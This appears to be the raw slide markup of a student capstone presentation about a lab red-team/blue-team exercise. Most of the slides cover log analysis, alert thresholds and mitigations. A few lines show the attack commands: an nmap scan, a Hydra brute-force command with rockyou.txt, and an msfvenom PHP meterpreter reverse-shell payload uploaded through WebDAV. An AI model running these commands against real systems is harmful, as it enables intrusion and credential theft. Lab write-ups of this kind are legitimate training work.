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5" roundtripDataSignature="AMtx7mi/BUk2jmLKoRIS7zA/RXxcaBBB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034A47-6ABC-4F38-B759-0FDF868693AE}">
  <a:tblStyle styleId="{BB034A47-6ABC-4F38-B759-0FDF868693A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Light-bold.fntdata"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-regular.fntdata"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-boldItalic.fntdata"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-italic.fntdata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Medium-regular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italic.fntdata"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium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Medium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6" name="Google Shape;11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2" name="Google Shape;11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5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Relationship Id="rId7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8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87.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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6.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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98.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image102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0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4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4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4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4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3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4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 rotWithShape="1">
          <a:blip r:embed="rId5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 rotWithShape="1">
          <a:blip r:embed="rId5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3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4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5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6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5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5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5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5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5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 rotWithShape="1">
          <a:blip r:embed="rId4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5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 rotWithShape="1">
          <a:blip r:embed="rId4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5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 rotWithShape="1">
          <a:blip r:embed="rId7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 rotWithShape="1">
          <a:blip r:embed="rId8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 rotWithShape="1">
          <a:blip r:embed="rId3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4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/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5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6"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6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7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6"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8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4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5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6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0"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3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0"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4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0"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5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6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7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8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9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8.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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1.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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Exploitation:LFI Vulnerability</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1123" name="Google Shape;1123;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1212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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121250" y="1421375"/>
            <a:ext cx="23517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I used msfvenom and meterpreter to deliver a payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> the vulnerable machine (Capstone VM).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Command:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.90 lport=4444 &gt;&gt; shell.php</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1125" name="Google Shape;1125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6" name="Google Shape;1126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8" name="Google Shape;1128;p10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6638156" y="947102"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1129" name="Google Shape;1129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1" name="Google Shape;1131;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6638150" y="153572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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6615800" y="1535725"/>
            <a:ext cx="23517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Using the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>multi/handler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>exploit i could get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> to the machine’s shell.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1133" name="Google Shape;1133;p10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2315956" y="887902"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1134" name="Google Shape;1134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6" name="Google Shape;113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950" y="1535725"/>
            <a:ext cx="4412450" cy="24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675" y="3941725"/>
            <a:ext cx="6073174" cy="8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0" name="Google Shape;1150;p12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12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="636600"/>
            <a:ext cx="84093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port scan started on January 13, 2022 at approximately 08:02 PM.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273,456 connections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were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made, the source IP was 192.168.1.90.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sudden peaks in network traffic indicate that this was a port scan.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2" name="Google Shape;11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50" y="7826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800"/>
            <a:ext cx="8409300" cy="31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9" name="Google Shape;1159;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304025" y="675700"/>
            <a:ext cx="86958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request started approximately 08:45 PM, 232,191 requests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were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made to the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/secret_folder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/secret_folder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contained a hash that I could use to access the system using another employee’s credentials (Ryan), and also allowed me to upload a payload, thus exploiting other vulnerabilities.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0" name="Google Shape;11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025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787" y="1411225"/>
            <a:ext cx="4242275" cy="34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7" name="Google Shape;1167;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324100" y="728175"/>
            <a:ext cx="85443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232,191 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requests were made in the attack to access the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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/secret_folder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3 attacks were successful.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8" name="Google Shape;11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00" y="8089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820" y="1467775"/>
            <a:ext cx="4523401" cy="35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5" name="Google Shape;1175;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="284750" y="741300"/>
            <a:ext cx="85968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185 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requests were made to access the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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/webdav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directory.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primary requests were for the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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passwd.dav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shell.php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files.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6" name="Google Shape;1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50" y="7413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862" y="1412675"/>
            <a:ext cx="5102575" cy="34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4" name="Google Shape;1184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90" name="Google Shape;1190;p17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Though useful, having alerts for every port scan is unrealistic. Setup an alert for any port scanning, with a threshold of 1000, and a severe alert for anything above 1000. Have alerts for any use of Nmap and setup a critical alert for aggressive scans.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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4286100" y="1543250"/>
            <a:ext cx="47280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Blocking ICMP so the machine does not respond to ping requests can be used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Regularly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run a system port scan to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proactively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detect and audit any open ports.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Ensure the firewall is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regularly patched.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197" name="Google Shape;1197;p1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detect unauthorized access requests for hidden folders and files, I would set an alert when these requests occur.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 would recommend a threshold of maximum 4 attempts that would trigger an alert to be sent.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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4244775" y="1602450"/>
            <a:ext cx="45843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 employees on confidentiality and privacy procedures.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Highly confidential folders should not be shared for public access, rename folders containing sensitive/private/company critical data.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Review IP addresses that cause an alert to be sent: either whitelist or block the IP addresses.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Increase password strength requirements to the directory(minimum length, mixture of upper case, lower case, numbers and special characters) and use multi-factor authentication.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04" name="Google Shape;1204;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="16616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 would detect future brute force attacks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for all password portals, such as the webserver and SSH.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threshold I would set to activate this alarm would be when 5 failed attempts are returned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05" name="Google Shape;1205;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4192975" y="1609850"/>
            <a:ext cx="4643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 would create a policy that locks out accounts for 30 minutes after 5 unsuccessful attempts.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Increase password strength requirements and expiry every 3 months. Consider multi-factor authentication.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 would create a list of blocked IP addresses based on IP addresses that have 40 unsuccessful attempts in 12 months. If the IP address happens to be a staff member, re-education may be required.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4" name="Google Shape;1024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5" name="Google Shape;1025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6" name="Google Shape;1026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7" name="Google Shape;1027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8" name="Google Shape;1028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0" name="Google Shape;1030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2" name="Google Shape;1032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3" name="Google Shape;1033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5" name="Google Shape;1035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6" name="Google Shape;1036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8" name="Google Shape;1038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11" name="Google Shape;1211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 would create an alert for non-whitelisted IPs connecting to webDAV and from non-secure locations.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 HTTP GET request, I would set an alarm that activates on any IP address trying to access the webDAV directory outside of those trusted IP addresses.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threshold I would set to activate this alarm would be when any HTTP PUT request is made.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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4286100" y="1602450"/>
            <a:ext cx="47799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Scanning all incoming traffic with anti-virus/anti-malware.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Creating a whitelist of trusted IP addresses and ensure my firewall security policy prevents all other access. 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 would ensure that any access to the WebDAV folder is only permitted by users with complex username and passwords.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18" name="Google Shape;1218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Monitor all incoming uploads and setup an alert for anything triggered by anti-virus/anti-malware.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Create an alert for files that contain suspicious code/scripts/file extensions.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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4392800" y="1602450"/>
            <a:ext cx="47511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Setup a secure anti-virus/anti-malware application that screens all incoming files and automatically updates daily.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Limit file types that can be uploaded, including restricting php.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Block all IP addresses other than whitelisted IP addresses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 access to the /webDAV folder to read only to prevent payloads from being uploaded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0" name="Google Shape;1050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"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7030300" y="910475"/>
            <a:ext cx="18402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562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Network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Address Range: 192.168.1.0/24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Netmask: 255.255.255.0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Gateway: 10.0.0.76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Machines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IPv4: 192.168.1.1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OS: Windows 10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Hostname: Azure Hyper-V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IPv4: 192.168.1.90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OS: Linux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Hostname: Kali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IPv4: 192.168.1.100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OS: Linux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Hostname: ELK-Stack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IPv4: 192.168.1.105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OS: Linux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Hostname: Capstone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6" name="Google Shape;1056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7" name="Google Shape;105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25" y="854075"/>
            <a:ext cx="6699600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0" name="Google Shape;1070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1" name="Google Shape;1071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{BB034A47-6ABC-4F38-B759-0FDF868693AE}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Azure Hyper-V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192.168.1.1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Host Virtual Machine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Kali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192.168.1.90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Attacking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Virtual Machine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Elk-Stack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192.168.1.100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Network Monitoring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Virtual Machine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Capstone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192.168.1.105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Target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Virtual Machine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(Vulnerable server)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77" name="Google Shape;1077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8" name="Google Shape;1078;p7"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="197925" y="108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{BB034A47-6ABC-4F38-B759-0FDF868693AE}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2910600"/>
                <a:gridCol w="2840550"/>
                <a:gridCol w="2840550"/>
              </a:tblGrid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8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Port 80 open with public access CVE-2019-6579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Open and unsecured access to anyone attempting entry using Port 80.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Files and Folders are readily accessible, which means sensitive files and folders can be found.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LFI Vulnerability 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LFI allows access into confidential files on a site. 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An LFI vulnerability allows attackers to gain access to sensitive credentials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Brute Force attack to discover password of user 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CVE-2019-3746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When an attacker uses </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>numerous</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t> username and password </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>combinations</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t> to access a device or system.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Easy system access by use of brute force with common </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>password</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t> lists such as rockyou.txt by programs such as ‘John the ripper’ and ‘Hydra’.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WebDAV </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Vulnerability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Exploit WebDAV on a server and Shell access is possible.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If WebDAV is not configured properly, it can allow hackers to remotely modify website content.</a:t>
                      </a:r>
                      <a:endParaRPr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Brute Force</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1084" name="Google Shape;1084;p8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="304425" y="14213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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="200775" y="1480625"/>
            <a:ext cx="2635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I used Hydra which is already pre–installed on Kali Linux. I also required a password list, in this case i used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> rockyou.txt password list.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Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get/company_folders/secret_folder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6" name="Google Shape;1086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87" name="Google Shape;1087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8" name="Google Shape;1088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8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2591106" y="947090"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="4546085" y="1452956"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1090" name="Google Shape;1090;p8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4546085" y="1452956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8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="4723611" y="1959781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2" name="Google Shape;1092;p8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="28365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2836575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exploit provided me with confirmation of the login name </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>‘ashton’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>as well as the password </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>‘leopoldo’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>.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pic>
        <p:nvPicPr>
          <p:cNvPr id="1094" name="Google Shape;109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25" y="3897250"/>
            <a:ext cx="4640799" cy="8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725" y="1292813"/>
            <a:ext cx="3581726" cy="2557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Google Shape;1096;p8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5265081" y="712777"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1097" name="Google Shape;1097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</a:t>
              </a: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Port 80 Open to Public Access</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1104" name="Google Shape;1104;p9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="300300" y="142212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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="300300" y="1422125"/>
            <a:ext cx="24849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I  used nmap to scan for open ports on target machine.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Command:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> nmap 192.168.1.90/24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07" name="Google Shape;1107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9" name="Google Shape;1109;p9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0" name="Google Shape;1110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2" name="Google Shape;1112;p9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2907175" y="142212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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2985325" y="1480625"/>
            <a:ext cx="2272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Nmap scanned 256 IP addresses and found 4 hosts. Port 22(SSH) and 80(HTTP) was of interest to me.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1114" name="Google Shape;1114;p9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15" name="Google Shape;1115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7" name="Google Shape;111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050" y="1480625"/>
            <a:ext cx="3274699" cy="33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